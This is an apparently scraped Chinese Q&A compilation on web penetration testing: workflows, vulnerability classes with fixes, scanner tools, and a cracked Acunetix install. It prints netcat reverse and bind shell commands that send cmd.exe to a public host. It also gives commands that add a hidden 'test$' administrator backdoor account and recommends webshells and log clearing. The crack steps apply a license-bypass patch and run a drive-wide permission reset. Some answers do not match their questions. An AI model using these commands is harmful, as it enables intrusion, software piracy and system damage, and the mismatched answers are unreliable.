⑴ 訪問如下超鏈接顯示localhost並拒絕了我們的連接請求是怎麼回事
顯示localhost並拒絕連接請求是因為設置錯誤,重新設置即可。
需要准備的工具:電腦。
1、在開始菜單搜索欄中輸入「管理工具」,點擊打開管理工具窗口。
⑵ web滲透是什麼
Web滲透測試分為白盒測試和黑盒測試,白盒測試是指目標網站的源碼等信息的情況下對其滲透,相當於代碼分析審計。而黑盒測試則是在對該網站系統信息不知情的情況下滲透,以下所說的Web滲透就是黑盒滲透。
Web滲透分為以下幾個步驟,信息收集,漏洞掃描,漏洞利用,提權,內網滲透,留後門,清理痕跡。一般的滲透思路就是看是否有注入漏洞,然後注入得到後台管理員賬號密碼,登錄後台,上傳小馬,再通過小馬上傳大馬,提權,內網轉發,進行內網滲透,掃描內網c段存活主機及開放埠,看其主機有無可利用漏洞(nessus)埠(nmap)對應服務及可能存在的漏洞,對其利用(msf)拿下內網,留下後門,清理痕跡。或者看是否有上傳文件的地方,上傳一句話木馬,再用菜刀鏈接,拿到資料庫並可執行cmd命令,可繼續上大馬.........思路很多,很多時候成不成功可能就是一個思路的問題,技術可以不高,思路一定得騷。
信息收集
信息收集是整個流程的重中之重,前期信息收集的越多,Web滲透的成功率就越高。
DNS域名信息:通過url獲取其真實ip,子域名(Layer子域名爆破機),旁站(K8旁站,御劍1.5),c段,網站負責人及其信息(whois查詢)
整站信息:伺服器操作系統、伺服器類型及版本(Apache/Nginx/Tomcat/IIS)、資料庫類型(Mysql/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型;
網站常見搭配為:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目錄信息(御劍,dirbust)
開放埠信息(nmp)
漏洞掃描
利用AWVS,AppScan,OWASP-ZAP,等可對網站進行網站漏洞的初步掃描,看其是否有可利用漏洞。
常見漏洞:
SQL注入
XSS跨站腳本
CSRF跨站請求偽造
XXE(XML外部實體注入)漏洞
SSRF(服務端請求偽造)漏洞
文件包含漏洞
文件上傳漏洞
文件解析漏洞
遠程代碼執行漏洞
CORS跨域資源共享漏洞
越權訪問漏洞
目錄遍歷漏洞和任意文件讀取/下載漏洞
漏洞利用
用工具也好什麼也好對相應漏洞進行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
後台密碼爆破(burp)
埠爆破(hydra)
提權
獲得shell之後我們許可權可能很低,因此要對自己提權,可以根據伺服器版本對應的exp進行提權,對於Windows系統也可看其補丁對應漏洞的exp進行提權
內網滲透
首先進行埠轉發可用nc
nc使用方法:
反向連接
在公網主機上進行監聽:
nc-lvp 4444
在內網主機上執行:
nc-e cmd.exe 公網主機ip4444
成功之後即可得到一個內網主機shell
正向連接
遠程主機上執行:
nc-l -p 4444 -t -e cmd.exe
本地主機上執行:
nc-vv 遠程主機ip4444
成功後,本地主機即可遠程主機的一個shell
然後就是對內網進行滲透了,可以用主機漏洞掃描工具(nessus,x-scan等)進行掃描看是否有可用漏洞,可用msf進行利用,或者用nmap掃描存活主機及開放埠,可用hydra進行埠爆破或者用msf對埠對應漏洞得到shell拿下內網留後門
留後門
對於網站上傳一句話木馬,留下後門
對於windows用戶可用hideadmin創建一個超級隱藏賬戶
手工:
netuser test$ 123456 /add
netlocalgroup administrators test$ /add
這樣的話在cmd命令中看不到,但在控制面板可以看到,還需要改注冊表才能實現控製版面也看不到,太過麻煩,不多贅述,所以還是用工具省心省力。
⑶ 滲透測試需要學什麼
滲透測試與入侵的最大區別
滲透測試:出於保護系統的目的,更全面地找出測試對象的安全隱患。
入侵:不擇手段地(甚至是具有破壞性的)拿到系統許可權。
一般滲透測試流程
流程並非萬能,只是一個工具。思考與流程並用,結合自己經驗。
2.1 明確目標
確定范圍:測試目標的范圍,ip,域名,內外網。
確定規則:能滲透到什麼程度,時間?能否修改上傳?能否提權等。
確定需求:web應用的漏洞(新上線程序)?業務邏輯漏洞(針對業務的)?人員許可權管理漏洞(針對人員、許可權)?等等。(立體全方位)
根據需求和自己技術能力來確定能不能做,能做多少。
2.2 信息收集
方式:主動掃描,開放搜索等
開放搜索:利用搜索引擎獲得,後台,未授權頁面,敏感url等。
基礎信息:IP,網段,域名,埠
系統信息:操作系統版本
應用信息:各埠的應用,例如web應用,郵件應用等等
版本信息:所有這些探測到的東西的版本。
服務信息
人員信息:域名注冊人員信息,web應用中網站發帖人的id,管理員姓名等。
防護信息:試著看能否探測到防護設備
2.3 漏洞探索
利用上一步中列出的各種系統,應用等使用相應的漏洞。
方法:
1.漏掃,awvs,IBM appscan等。
2.結合漏洞去exploit-db等位置找利用。
3.在網上尋找驗證poc。
內容:
系統漏洞:系統沒有及時打補丁
Websever漏洞:Websever配置問題
Web應用漏洞:Web應用開發問題
其它埠服務漏洞:各種21/8080(st2)/7001/22/3389
通信安全:明文傳輸,token在cookie中傳送等。
2.4 漏洞驗證
將上一步中發現的有可能可以成功利用的全部漏洞都驗證一遍。結合實際情況,搭建模擬環境進行試驗。成功後再應用於目標中。
自動化驗證:結合自動化掃描工具提供的結果
手工驗證,根據公開資源進行驗證
試驗驗證:自己搭建模擬環境進行驗證
登陸猜解:有時可以嘗試猜解一下登陸口的賬號密碼等信息
業務漏洞驗證:如發現業務漏洞,要進行驗證
⑷ acunetix破解版登陸不了
重新安裝試試。
1、下載軟體壓縮包文件,首先點擊「Acunetix.Web.12.0.180911134.Retail.exe」安裝最新版原程序
2、閱讀並同意軟體安裝協議
3、設置登錄信息,包括郵箱地址以及登錄密碼(密碼要8位,字母數字特殊字元)
要牢記email和密碼,後面登錄會用到-------重要,如果事後忘記的賬號密碼:解決辦法:去acunetix的安裝目錄下,雙擊ChangePassword.exe,重置密碼就可以了
4、設置默認埠,一般默認為3443
5、選擇附加任務,建議創建桌面快捷方式
6、核對安裝信息,確認無誤後即可點擊【Install】按鈕繼續
7、等待程序安裝完畢,直接點擊【Finish】按鈕退出向導即可
8、打開任務管理器,停止服務中的 acunetix. msc
9、將破解補丁復制到軟體根目錄下,雙擊打開,點擊應用即可
默認路徑為:C:Program Files (x86)Acunetix12.0.180911134
10、在激活窗口中輸入任何信息
11、默認即可,直接點擊下一步
12、注冊成功,點擊【Finish】退出即可
13、以管理員身份運行 cmd 並運行cacls "C:." /t /p everyone:r
選擇"是"
14、把服務啟動後,啟動桌面快捷方式或者直接在瀏覽器中輸入「https://localhost:3443/#/」,登錄之前設置好的登錄信息,即可直接使用~
15、點擊Targets—》add Target
16、生成報告方法
17、因報告是英文模式,所以選擇下載html格式,然後通過谷歌瀏覽器進行翻譯成中午,然後另存為html格式,重新打開就是中文的報告了
⑸ 滲透測試的步驟有哪些
滲透測試步驟
明確目標
· 確定范圍:測試目標的范圍,ip,域名,內外網。
· 確定規則:能滲透到什麼程度,時間?能否修改上傳?能否提權等。
· 確定需求:web應用的漏洞、業務邏輯漏洞、人員許可權管理漏洞等等。
信息收集
方式:主動掃描,開放搜索等。
開放搜索:利用搜索引擎獲得,後台,未授權頁面,敏感url等。
漏洞探索
利用上一步中列出的各種系統,應用等使用相應的漏洞。
方法:
1.漏掃,awvs,IBM appscan等。
2.結合漏洞去exploit-db等位置找利用。
3.在網上尋找驗證poc。
內容:
系統漏洞:系統沒有及時打補丁
Websever漏洞:Websever配置問題
Web應用漏洞:Web應用開發問題
其它埠服務漏洞:各種21/8080(st2)/7001/22/3389
通信安全:明文傳輸,token在cookie中傳送等。
漏洞驗證
將上一步中發現的有可能可以成功利用的全部漏洞都驗證一遍,結合實際情況,搭建模擬環境進行試驗。成功後再應用於目標中。
自動化驗證:結合自動化掃描工具提供的結果
手工驗證,根據公開資源進行驗證
試驗驗證:自己搭建模擬環境進行驗證
登陸猜解:有時可以嘗試猜解一下登陸口的賬號密碼等信息
業務漏洞驗證:如發現業務漏洞,要進行驗證
公開資源的利用
信息分析
為下一步實施滲透做准備:
精準打擊:准備好上一步探測到的漏洞的exp,用來精準打擊
繞過防禦機制:是否有防火牆等設備,如何繞過
定製攻擊路徑:最佳工具路徑,根據薄弱入口,高內網許可權位置,最終目標
繞過檢測機制:是否有檢測機制,流量監控,殺毒軟體,惡意代碼檢測等
攻擊代碼:經過試驗得來的代碼,包括不限於xss代碼,sql注入語句等
獲取所需
實施攻擊:根據前幾步的結果,進行攻擊
獲取內部信息:基礎設施
進一步滲透:內網入侵,敏感目標
持續性存在:一般我們對客戶做滲透不需要。rookit,後門,添加管理賬號,駐扎手法等
清理痕跡:清理相關日誌,上傳文件等
信息整理
整理滲透工具:整理滲透過程中用到的代碼,poc,exp等
整理收集信息:整理滲透過程中收集到的一切信息
整理漏洞信息:整理滲透過程中遇到的各種漏洞,各種脆弱位置信息
形成報告
按需整理:按照之前第一步跟客戶確定好的范圍,需求來整理資料,並將資料形成報告
補充介紹:要對漏洞成因,驗證過程和帶來危害進行分析
修補建議:當然要對所有產生的問題提出合理高效安全的解決辦法
⑹ 為什麼使用Acunetix時提示拒絕用戶角色
你確定你的安裝包是完整的?重新安裝試下,系統是原版的還是自己刷的,內存是否已滿,這個跟最高許可權沒有關系!
⑺ 有沒有好用的漏洞掃描工具
1、OpenVAS漏洞掃描工具
OpenVAS漏洞掃描器是一種漏洞分析工具,由於其全面的特性,IT部門可以使用它來掃描伺服器和網路設備。
這些掃描器將通過掃描現有設施中的開放埠、錯誤配置和漏洞來查找IP地址並檢查任何開放服務。掃描完成後,將自動生成報告並以電子郵件形式發送,以供進一步研究和更正。
OpenVAS也可以從外部伺服器進行操作,從黑客的角度出發,從而確定暴露的埠或服務並及時進行處理。如果您已經擁有一個內部事件響應或檢測系統,則OpenVAS將幫助您使用網路滲透測試工具和整個警報來改進網路監控。
2、Nessus漏洞掃描工具
Tenable的Nessus
Professional是一款面向安全專業人士的工具,負責修補程序、軟體問題、惡意軟體和廣告軟體刪除工具,以及各種操作系統和應用程序的錯誤配置。
Nessus提供了一個主動的安全程序,在黑客利用漏洞入侵網路之前及時識別漏洞,同時還處理遠程代碼執行漏洞。
它關心大多數網路設備,包含虛擬、物理和雲基礎架構。Tenable還被認為是Gartner Peer
Insights在2003年3月之前進行危險性評估的首選方案。
3、Nexpose community
Nexpose community是由Rapid7開發的漏洞掃描工具,它是涵蓋了大多數網路檢查的開源解決方案。
這個解決方案的多功能性是IT管理員的一個優勢,它可以被整合到一個Metaspoit框架中,能夠在任何新設備訪問網路時檢測和掃描設備。
它還可以監控真實世界中的漏洞暴露,最重要的是,它可以進行相應的修復。此外,漏洞掃描程序還可以對威脅進行風險評分,范圍在1-1000之間,從而為安全專家在漏洞被利用之前修復漏洞提供了便利。Nexpose目前可免費試用一年。
4、Nikto
Nikto是另一個免費的在線漏洞掃描工具,如Nexpose community。
Nikto可幫助您了解伺服器功能,檢查其版本,在網路伺服器上進行測試以識別威脅和惡意軟體的存在,並掃描不同的協議,如https、httpd、http等。
還有助於在短時間內掃描伺服器的多個埠,Nikto因其效率和伺服器強化功能而受到青睞。
5、Retina
Retina漏洞掃描工具是基於Web的開源軟體,從中心位置負責漏洞管理。它的功能包括修補、合規性、配置和報告。
負責資料庫、工作站、伺服器分析和Web應用程序,完全支持VCenter集成和應用程序掃描虛擬環境;它負責多個平台,提供完整的跨平台漏洞評估和安全性。
⑻ 滲透測試需要學那些知識
web黑客滲透測試入門需要學哪些?
學習web滲透,就是從零散到整體。我們入門門檻比較低,學會用工具就可以了。但是從入門到另一個層次就比較難了,也是大部分腳本小子迷茫的地方。
在web滲透的核心那就是思路,大量的思路來源是來自於自己的知識積累和豐富的經驗。 學而不思則罔思而不學則殆。
當我找到了一個注入點:
首先放進工具一點,工具提示不存在注入。很奇怪,明明是存在的,發個某大牛,某大你不想說話並向你扔了個鏈接,你發現居然爆出了帳號密碼。
太多的人都是處於這個超級小白階段,這個階段處於菜鳥階段,我稱為打哪是哪。
我來問問:
brup suite你會用?你會用來做什麼,爆破?你知道怎麼抓包分析post注入嗎?你知道繞過上傳時brup suite的神奇之處嗎?
sqlmap 你會用?你會用來做什麼,-u?-dbs?你知道怎麼在sqlmap中執行sql語句嗎?你知道sqlmap怎麼反彈shell嗎?
xss 你都懂?你知道xss平台那麼多模塊都有什麼妙用嗎?你知道尖括弧過濾都有哪些繞過方式嗎?
入門學習思考 可能遇到的問題 和新手需知:
你知道svn源代碼泄露是什麼?通過審計代碼能做到什麼嗎?
你知道在發現st2漏洞命令執行時出現目錄限制的時候怎麼突破嗎?有多少種方式可以突破,在什麼樣的場景下容易出現,如果有殺軟怎麼繞過嗎?
你知道在3306允許外鏈的情況下可以爆破嗎?你以為掃描器會把埠的風險都列出來給你嗎?
你知道一個縝密的郵箱偽造&社工可能就能導致網站淪陷嗎?
你知道遇到weblogic等弱口令的時候如何去部署war拿shell嗎?
你知道各種java中間件的埠是哪些嗎?各種反序列化漏洞是怎麼樣快速定位資料庫配置文件的嗎?
你知道http://ASP.NET填充Oracle漏洞的利用方法嗎?你知道掃描器都是誤報嗎?你知道手工怎麼測試漏洞真實存在嗎?
你知道oa系統都有哪些通用注入和無限制getshell嗎?
你知道phpmyadmin可以爆破嗎?什麼樣的版本可以爆路徑,什麼樣的版本幾乎拿不到shell嗎?
太多太多了,我上面提到的也只是web方面的冰山一角,後面的提權、內網等等難題如海。
⑼ 滲透測試應該怎麼做呢
01、信息收集
1、域名、IP、埠
域名信息查詢:信息可用於後續滲透
IP信息查詢:確認域名對應IP,確認IP是否真實,確認通信是否正常
埠信息查詢:NMap掃描,確認開放埠
發現:一共開放兩個埠,80為web訪問埠,3389為windows遠程登陸埠,嘿嘿嘿,試一下
發現:是Windows Server 2003系統,OK,到此為止。
2、指紋識別
其實就是網站的信息。比如通過可以訪問的資源,如網站首頁,查看源代碼:
看看是否存在文件遍歷的漏洞(如圖片路徑,再通過…/遍歷文件)
是否使用了存在漏洞的框架(如果沒有現成的就自己挖)
02、漏洞掃描
1、主機掃描
Nessus
經典主機漏掃工具,看看有沒有CVE漏洞:
2、Web掃描
AWVS(Acunetix | Website Security Scanner)掃描器
PS:掃描器可能會對網站構成傷害,小心謹慎使用。
03、滲透測試
1、弱口令漏洞
漏洞描述
目標網站管理入口(或資料庫等組件的外部連接)使用了容易被猜測的簡單字元口令、或者是默認系統賬號口令。
滲透測試
① 如果不存在驗證碼,則直接使用相對應的弱口令字典使用burpsuite 進行爆破
② 如果存在驗證碼,則看驗證碼是否存在繞過、以及看驗證碼是否容易識別
風險評級:高風險
安全建議
① 默認口令以及修改口令都應保證復雜度,比如:大小寫字母與數字或特殊字元的組合,口令長度不小於8位等
② 定期檢查和更換網站管理口令
2、文件下載(目錄瀏覽)漏洞
漏洞描述
一些網站由於業務需求,可能提供文件查看或下載的功能,如果對用戶查看或下載的文件不做限制,則惡意用戶就能夠查看或下載任意的文件,可以是源代碼文件、敏感文件等。
滲透測試
① 查找可能存在文件包含的漏洞點,比如js,css等頁面代碼路徑
② 看看有沒有文件上傳訪問的功能
③ 採用…/來測試能否誇目錄訪問文件
風險評級:高風險
安全建議
① 採用白名單機制限制伺服器目錄的訪問,以及可以訪問的文件類型(小心被繞過)
② 過濾【./】等特殊字元
③ 採用文件流的訪問返回上傳文件(如用戶頭像),不要通過真實的網站路徑。
示例:tomcat,默認關閉路徑瀏覽的功能:
<param-name>listings</param-name>
<param-value>false</param-value>
3、任意文件上傳漏洞
漏洞描述
目標網站允許用戶向網站直接上傳文件,但未對所上傳文件的類型和內容進行嚴格的過濾。
滲透測試
① 收集網站信息,判斷使用的語言(PHP,ASP,JSP)
② 過濾規則繞過方法:文件上傳繞過技巧
風險評級:高風險
安全建議
① 對上傳文件做有效文件類型判斷,採用白名單控制的方法,開放只允許上傳的文件型式;
② 文件類型判斷,應對上傳文件的後綴、文件頭、圖片類的預覽圖等做檢測來判斷文件類型,同時注意重命名(Md5加密)上傳文件的文件名避免攻擊者利用WEB服務的缺陷構造畸形文件名實現攻擊目的;
③ 禁止上傳目錄有執行許可權;
④ 使用隨機數改寫文件名和文件路徑,使得用戶不能輕易訪問自己上傳的文件。
4、命令注入漏洞
漏洞描述
目標網站未對用戶輸入的字元進行特殊字元過濾或合法性校驗,允許用戶輸入特殊語句,導致各種調用系統命令的web應用,會被攻擊者通過命令拼接、繞過黑名單等方式,在服務端運行惡意的系統命令。
滲透測試
風險評級:高風險
安全建議
① 拒絕使用拼接語句的方式進行參數傳遞;
② 盡量使用白名單的方式(首選方式);
③ 過濾危險方法、特殊字元,如:【|】【&】【;】【』】【"】等
5、SQL注入漏洞
漏洞描述
目標網站未對用戶輸入的字元進行特殊字元過濾或合法性校驗,允許用戶輸入特殊語句查詢後台資料庫相關信息
滲透測試
① 手動測試:判斷是否存在SQL注入,判斷是字元型還是數字型,是否需要盲注
② 工具測試:使用sqlmap等工具進行輔助測試
風險評級:高風險
安全建議
① 防範SQL注入攻擊的最佳方式就是將查詢的邏輯與其數據分隔,如Java的預處理,PHP的PDO
② 拒絕使用拼接SQL的方式
6、跨站腳本漏洞
漏洞描述
當應用程序的網頁中包含不受信任的、未經恰當驗證或轉義的數據時,或者使用可以創建 HTML或JavaScript 的瀏覽器 API 更新現有的網頁時,就會出現 XSS 缺陷。XSS 讓攻擊者能夠在受害者的瀏覽器中執行腳本,並劫持用戶會話、破壞網站或將用戶重定向到惡意站點。
三種XSS漏洞:
① 存儲型:用戶輸入的信息被持久化,並能夠在頁面顯示的功能,都可能存在存儲型XSS,例如用戶留言、個人信息修改等。
② 反射型:URL參數需要在頁面顯示的功能都可能存在反射型跨站腳本攻擊,例如站內搜索、查詢功能。
③ DOM型:涉及DOM對象的頁面程序,包括:document.URL、document.location、document.referrer、window.location等
滲透測試
存儲型,反射型,DOM型
風險評級:高風險
安全建議
① 不信任用戶提交的任何內容,對用戶輸入的內容,在後台都需要進行長度檢查,並且對【<】【>】【"】【』】【&】等字元做過濾
② 任何內容返回到頁面顯示之前都必須加以html編碼,即將【<】【>】【"】【』】【&】進行轉義。
7、跨站請求偽造漏洞
漏洞描述
CSRF,全稱為Cross-Site Request Forgery,跨站請求偽造,是一種網路攻擊方式,它可以在用戶毫不知情的情況下,以用戶的名義偽造請求發送給被攻擊站點,從而在未授權的情況下進行許可權保護內的操作,如修改密碼,轉賬等。
滲透測試
風險評級:中風險(如果相關業務極其重要,則為高風險)
安全建議
① 使用一次性令牌:用戶登錄後產生隨機token並賦值給頁面中的某個Hidden標簽,提交表單時候,同時提交這個Hidden標簽並驗證,驗證後重新產生新的token,並賦值給hidden標簽;
② 適當場景添加驗證碼輸入:每次的用戶提交都需要用戶在表單中填寫一個圖片上的隨機字元串;
③ 請求頭Referer效驗,url請求是否前部匹配Http(s)😕/ServerHost
④ 關鍵信息輸入確認提交信息的用戶身份是否合法,比如修改密碼一定要提供原密碼輸入
⑤ 用戶自身可以通過在瀏覽其它站點前登出站點或者在瀏覽器會話結束後清理瀏覽器的cookie;
8、內部後台地址暴露
漏洞描述
一些僅被內部訪問的地址,對外部暴露了,如:管理員登陸頁面;系統監控頁面;API介面描述頁面等,這些會導致信息泄露,後台登陸等地址還可能被爆破。
滲透測試
① 通過常用的地址進行探測,如login.html,manager.html,api.html等;
② 可以借用burpsuite和常規頁面地址字典,進行掃描探測
風險評級:中風險
安全建議
① 禁止外網訪問後台地址
② 使用非常規路徑(如對md5加密)
9、信息泄露漏洞
漏洞描述
① 備份信息泄露:目標網站未及時刪除編輯器或者人員在編輯文件時,產生的臨時文件,或者相關備份信息未及時刪除導致信息泄露。
② 測試頁面信息泄露:測試界面未及時刪除,導致測試界面暴露,被他人訪問。
③ 源碼信息泄露:目標網站文件訪問控制設置不當,WEB伺服器開啟源碼下載功能,允許用戶訪問網站源碼。
④ 錯誤信息泄露:目標網站WEB程序和伺服器未屏蔽錯誤信息回顯,頁面含有CGI處理錯誤的代碼級別的詳細信息,例如SQL語句執行錯誤原因,PHP的錯誤行數等。
⑤ 介面信息泄露:目標網站介面訪問控制不嚴,導致網站內部敏感信息泄露。
滲透測試
① 備份信息泄露、測試頁面信息泄露、源碼信息泄露,測試方法:使用字典,爆破相關目錄,看是否存在相關敏感文件
② 錯誤信息泄露,測試方法:發送畸形的數據報文、非正常的報文進行探測,看是否對錯誤參數處理妥當。
③ 介面信息泄露漏洞,測試方法:使用爬蟲或者掃描器爬取獲取介面相關信息,看目標網站對介面許可權是否合理
風險評級:一般為中風險,如果源碼大量泄漏或大量客戶敏感信息泄露。
安全建議
① 備份信息泄露漏洞:刪除相關備份信息,做好許可權控制
② 測試頁面信息泄露漏洞:刪除相關測試界面,做好許可權控制
③ 源碼信息泄露漏洞:做好許可權控制
④ 錯誤信息泄露漏洞:將錯誤信息對用戶透明化,在CGI處理錯誤後可以返回友好的提示語以及返回碼。但是不可以提示用戶出錯的代碼級別的詳細原因
⑤ 介面信息泄露漏洞:對介面訪問許可權嚴格控制
10、失效的身份認證
漏洞描述
通常,通過錯誤使用應用程序的身份認證和會話管理功能,攻擊者能夠破譯密碼、密鑰或會話令牌, 或者利用其它開發缺陷來暫時性或永久性冒充其他用戶的身份。
滲透測試
① 在登陸前後觀察,前端提交信息中,隨機變化的數據,總有與當前已登陸用戶進行綁定的會話唯一標識,常見如cookie
② 一般現在網站沒有那種簡單可破解的標識,但是如果是跨站認證,單點登錄場景中,可能為了開發方便而簡化了身份認證
風險評級:高風險
安全建議
① 使用強身份識別,不使用簡單弱加密方式進行身份識別;
② 伺服器端使用安全的會話管理器,在登錄後生成高度復雜的新隨機會話ID。會話ID不能在URL中,可以安全地存儲,在登出、閑置超時後使其失效。
11、失效的訪問控制
漏洞描述
未對通過身份驗證的用戶實施恰當的訪問控制。攻擊者可以利用這些缺陷訪問未經授權的功能或數據,例如:訪問其他用戶的帳戶、查看敏感文件、修改其他用戶的數據、更改訪問許可權等。
滲透測試
① 登入後,通過burpsuite 抓取相關url 鏈接,獲取到url 鏈接之後,在另一個瀏覽器打開相關鏈接,看能夠通過另一個未登入的瀏覽器直接訪問該功能點。
② 使用A用戶登陸,然後在另一個瀏覽器使用B用戶登陸,使用B訪問A獨有的功能,看能否訪問。
風險評級:高風險
安全建議
① 除公有資源外,默認情況下拒絕訪問非本人所有的私有資源;
② 對API和控制器的訪問進行速率限制,以最大限度地降低自動化攻擊工具的危害;
③ 當用戶注銷後,伺服器上的Cookie,JWT等令牌應失效;
④ 對每一個業務請求,都進行許可權校驗。
12、安全配置錯誤
漏洞描述
應用程序缺少適當的安全加固,或者雲服務的許可權配置錯誤。
① 應用程序啟用或安裝了不必要的功能(例如:不必要的埠、服務、網頁、帳戶或許可權)。
② 默認帳戶的密碼仍然可用且沒有更改。
③ 錯誤處理機制向用戶披露堆棧跟蹤或其他大量錯誤信息。
④ 對於更新的系統,禁用或不安全地配置最新的安全功能。
⑤ 應用程序伺服器、應用程序框架(如:Struts、Spring、ASP.NET)、庫文件、資料庫等沒有進行相關安全配置。
滲透測試
先對應用指紋等進行信息搜集,然後針對搜集的信息,看相關應用默認配置是否有更改,是否有加固過;埠開放情況,是否開放了多餘的埠;
風險評級:中風險
安全建議
搭建最小化平台,該平台不包含任何不必要的功能、組件、文檔和示例。移除或不安裝不適用的功能和框架。在所有環境中按照標準的加固流程進行正確安全配置。
13、使用含有已知漏洞的組件
漏洞描述
使用了不再支持或者過時的組件。這包括:OS、Web伺服器、應用程序伺服器、資料庫管理系統(DBMS)、應用程序、API和所有的組件、運行環境和庫。
滲透測試
① 根據前期信息搜集的信息,查看相關組件的版本,看是否使用了不在支持或者過時的組件。一般來說,信息搜集,可通過http返回頭、相關錯誤信息、應用指紋、埠探測(Nmap)等手段搜集。
② Nmap等工具也可以用於獲取操作系統版本信息
③ 通過CVE,CNVD等平台可以獲取當前組件版本是否存在漏洞
風險評級:按照存在漏洞的組件的安全風險值判定當前風險。
安全建議
① 移除不使用的依賴、不需要的功能、組件、文件和文檔;
② 僅從官方渠道安全的獲取組件(盡量保證是最新版本),並使用簽名機制來降低組件被篡改或加入惡意漏洞的風險;
③ 監控那些不再維護或者不發布安全補丁的庫和組件。如果不能打補丁,可以考慮部署虛擬補丁來監控、檢測或保護。
詳細學習可參考:
⑽ 在線的web漏洞掃描平台有哪些
建議騰訊電腦管家修復,系統漏洞經常被黑客利用傳播惡意程序(如網頁掛馬),必須及時修復系統漏洞才能有效防止計算機在上網時被黑客入侵,不過如果安裝了安全軟體,並且漏洞介紹看起來不是那麼嚴重的話,可以選擇不修復。
Windows系統漏洞是指操作系統在開發過程中存在的技術缺陷,這些缺陷可能導致其他用戶在未被授權的情況下非法訪問或攻擊計算機系統。因此,系統開發商一般每月都會發布最新的補丁用以修復新發現的漏洞。目前,騰訊電腦管家支持修復Windows操作系統漏洞和部分第三方軟體漏洞。